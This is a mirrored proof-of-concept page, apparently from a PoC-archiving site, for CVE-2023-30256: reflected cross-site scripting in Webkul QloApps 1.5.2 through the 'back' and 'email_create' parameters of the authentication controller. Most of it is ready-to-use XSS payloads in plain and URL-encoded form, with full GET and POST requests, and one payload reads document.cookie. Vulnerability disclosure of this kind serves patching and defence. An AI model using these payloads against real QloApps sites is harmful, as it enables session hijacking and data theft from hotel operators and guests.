Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-30256 PoC — Webkil QloApps 跨站脚本漏洞

Source
Associated Vulnerability
Title:Webkil QloApps 跨站脚本漏洞 (CVE-2023-30256)
Description:Webkil QloApps是免费的开源酒店预订和在线预订系统。 Webkil QloApps v.1.5.2版本存在安全漏洞。攻击者利用该漏洞通过AuthController.php文件中的back和email_create参数获取敏感信息。
Description
QloApp 1.5.2: Vulnerable to XSS on two Parameter (email_create and back)
Readme
# Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)
Webkul QloApps 1.5.2: Vulnerable to XSS on two Parameter (email_create and back)

## Exploit - Proof of Concept (POC)

### XXS: 'back' Parameter
```
Payload (Parameter back – Plain text): 
[xss onfocus=alert(1) autofocus= xss] 

Payload (Parameter back – URL Encoded): 
[xss%20onfocus%3dalert(1)%20autofocus%3d%20xss]

Full GET Request (Parameter back): 
[http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]
```

![image info](./back-parameter-xss.png)


### XXS: 'email_create' Parameter
```
Payload (Parameter email_create – Plain text): 
[xss><img src=a onerror=alert(document.cookie)>xss] 

Payload (Parameter email_create – URL Encoded): 
[xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss]

POST Request (Parameter email_create) (POST REQUEST DATA ONLY): 
[controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]
```

![image info](./email_create-parameter-xss.png)


Confirmed on: 30 March 2023 

Vendor: QloApps [https://github.com/webkul/hotelcommerce]
File Snapshot

[4.0K] /data/pocs/1505ad272220f75e04816eecfef8896402d54968 ├── [223K] back-parameter-xss.png ├── [219K] email_create-parameter-xss.png └── [1.3K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.